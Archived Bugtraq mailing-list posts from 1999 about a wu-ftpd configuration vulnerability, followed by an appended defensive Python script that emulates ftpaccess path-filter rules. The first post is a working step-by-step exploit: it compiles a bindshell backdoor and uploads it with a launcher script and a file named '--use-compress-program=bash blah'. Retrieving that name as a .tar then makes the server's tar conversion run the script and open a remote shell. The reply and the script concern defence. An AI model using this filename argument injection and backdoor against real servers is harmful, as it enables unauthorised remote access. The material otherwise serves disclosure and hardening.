4607685 1999-12-21  23:00  /86 lines/ Postmaster
Recipient: Bugtraq (import) <8979>
Subject: More details on the WU-FTPD configuration vulnerability.
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
X-Sender: suid@jawa.chilli.net.au
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.LNX.4.20.9912212308430.5808-100000@jawa.chilli.net.au>
Date:         Tue, 21 Dec 1999 23:10:56 +1100
Reply-To: suid <suid@SUID.KG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: suid <suid@SUID.KG>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Good evening all,

I have noticed that in my original Bugtraq posting/paper I mentioned
the possibility of executing arbitrary code if you actually have a
valid FTP only account on a system, but did not include specific info
on this.

I realise now that this information is more relevant than the
anonymous FTP exploit as it is the default configuration and many,
many people give users accounts on this kind of setup believing it to
be `secure'.

Please find below an addendum to my paper
(http://www.suid.kg/advisories/001.txt)

You can find this on the web with the rest of my stuff at the new
location http://www.suid.kg/ .

Merry Xmas,
suid@suid.kg


---


suid@suid.kg - an addendum to wu-ftpd configuration vulnerability
exploit information

Background:

	In the initial advisory I mentioned that users with valid ftp
	access only accounts may also execute arbitrary code. I did
	not however include exploit information for this. This
	information is now found below.

Exploit Information:

	With a valid FTP-only account on the server, the difficulty goes
	right down. You also have the added benefit of not being stuck in
	a chroot() environment at the end (by default). Local exploit time.

	The exploit goes along much the same lines as the anonymous
	FTP exploit does:

	Create a backdoor, using bindshell from our previous example:

	$ gcc bindshell.c -o b -static

	If you can perform a SITE CHMOD (default for normal non-anon
	users on wu-ftpd), then you can use the following script
	example. Create a script to exec the desired commands:

	$ cat > blah
	#!/bin/bash
	./b &
	^D

	Now create empty file "--use-compress-program=bash blah"

	$ > "--use-compress-program=bash blah"

	FTP to your target, login with your username/password. Upload
	your 3 files:

	ftp> put b
	ftp> put blah
	ftp> put "--use-compress-program=bash blah"

	Do a SITE CHMOD for b and blah:
	
	ftp> quote SITE CHMOD 0755 b
	ftp> quote SITE CHMOD 0755 blah
	
	Now get your file:

	ftp> get "--use-compress-program=bash blah".tar

	That's all there is to it. You now should have a shell on
	whatever port you specified.

	Merry Xmas!
(4607685) ------------------------------------------(Reformatted)

4611500 1999-12-23  19:54  /35 lines/ Postmaster
Recipient: Bugtraq (import) <9015>
Subject: Re: ftp conversions exploit
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <19991222200112.A30322@walton.maths.tcd.ie>
Date:         Wed, 22 Dec 1999 20:01:12 +0000
Reply-To: dwmalone@MATHS.TCD.IE
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: David Malone <dwmalone@MATHS.TCD.IE>
X-To:         Desi Hacker <desihacker@HOTMAIL.COM>
X-cc:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <19991222044725.77471.qmail@hotmail.com>

On Wed, Dec 22, 1999 at 04:47:25AM +0000, Desi Hacker wrote:

> during the exploiting process.. the final step as instructed by the author
> doesn't work
>
> ftp> get "--use-compress-program=sh blah".tar
> or
> ftp> get "--use-compress-program=sh blah".tar
>
> instead it gives a warning of permission denied!
> in case of anon ftp logging

The ftpaccess man page contains the following example line:

	path-filter anonymous /etc/pathmsg ^[-A-Za-z0-9._]*$ ^\. ^-

which disallows filenames starting with . or - to anonymous users.
Maybe your ftpaccess line contains this?

	David.
(4611500) ------------------------------------------
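The path-filter directive David quotes is the configuration-side control that decides whether a filename such as the one in the first post ever reaches the conversion code. The following is an added example, not code from either poster or from wu-ftpd itself: a small Python emulation of the ftpaccess path-filter rule (typelist, message path, one allowed-charset regexp, then any number of disallowed regexps, applied only to users in the typelist) that an administrator can run against their own ftpaccess to see which user classes are actually covered. The semantics assumed here (name must match the allowed regexp and none of the disallowed ones; a user type with no applicable path-filter line accepts everything) follow the man page wording; the function names and the sample ftpaccess text are constructed for this example.

```python
import re

# Constructed sample ftpaccess fragment, not a real server's configuration.
# It mirrors the man page example quoted in the thread: only anonymous
# users are filtered, real and guest users get no path-filter at all.
SAMPLE_FTPACCESS = r"""
class   all   real,guest,anonymous  *
path-filter anonymous /etc/pathmsg ^[-A-Za-z0-9._]*$ ^\. ^-
"""

# Same fragment with the filter widened to every user class (constructed).
HARDENED_FTPACCESS = r"""
class   all   real,guest,anonymous  *
path-filter real,guest,anonymous /etc/pathmsg ^[-A-Za-z0-9._]*$ ^\. ^-
"""


def parse_path_filter(line):
    """Split one path-filter directive into its fields.

    Layout (from the ftpaccess man page):
        path-filter <typelist> <mesg> <allowed_charset> [<disallowed regexp> ...]
    """
    fields = line.split()
    if len(fields) < 4 or fields[0] != "path-filter":
        raise ValueError("not a path-filter directive: %r" % line)
    return {
        "typelist": fields[1].split(","),
        "mesg": fields[2],
        "allowed": fields[3],
        "disallowed": fields[4:],
    }


def path_filter_allows(name, allowed, disallowed):
    """Assumed rule: name must match the allowed regexp and no disallowed one."""
    if not re.search(allowed, name):
        return False
    return not any(re.search(pattern, name) for pattern in disallowed)


def applicable_filters(ftpaccess_text, user_type):
    """Return the parsed path-filter lines whose typelist names user_type."""
    filters = []
    for raw in ftpaccess_text.splitlines():
        line = raw.strip()
        if not line.startswith("path-filter"):
            continue
        parsed = parse_path_filter(line)
        if user_type in parsed["typelist"]:
            filters.append(parsed)
    return filters


def filename_accepted(ftpaccess_text, user_type, name):
    """True if every path-filter that applies to user_type accepts the name.

    With no applicable filter the name is accepted unchanged, which is the
    situation the first post relies on for real (non-anonymous) accounts.
    """
    for f in applicable_filters(ftpaccess_text, user_type):
        if not path_filter_allows(name, f["allowed"], f["disallowed"]):
            return False
    return True


def unfiltered_user_types(ftpaccess_text, user_types=("real", "guest", "anonymous")):
    """List the user classes that no path-filter line covers at all."""
    return [t for t in user_types if not applicable_filters(ftpaccess_text, t)]


if __name__ == "__main__":
    # The conversion-triggering name from the thread, used here only as input.
    odd_name = "--use-compress-program=bash blah"
    for user_type in ("anonymous", "real"):
        print(user_type, "README ->", filename_accepted(SAMPLE_FTPACCESS, user_type, "README"))
        print(user_type, repr(odd_name), "->", filename_accepted(SAMPLE_FTPACCESS, user_type, odd_name))
    print("unfiltered in sample:", unfiltered_user_types(SAMPLE_FTPACCESS))
    print("unfiltered in hardened:", unfiltered_user_types(HARDENED_FTPACCESS))
```

Run against the sample fragment, the script reports that anonymous uploads of names beginning with `-` or `.` (or containing `=` or a space, which the allowed charset excludes) are refused, while a real user's identical upload is accepted because no filter line names `real`; the hardened fragment closes that gap. The emulation only checks the filename rule, so it says nothing about whether conversions themselves are enabled.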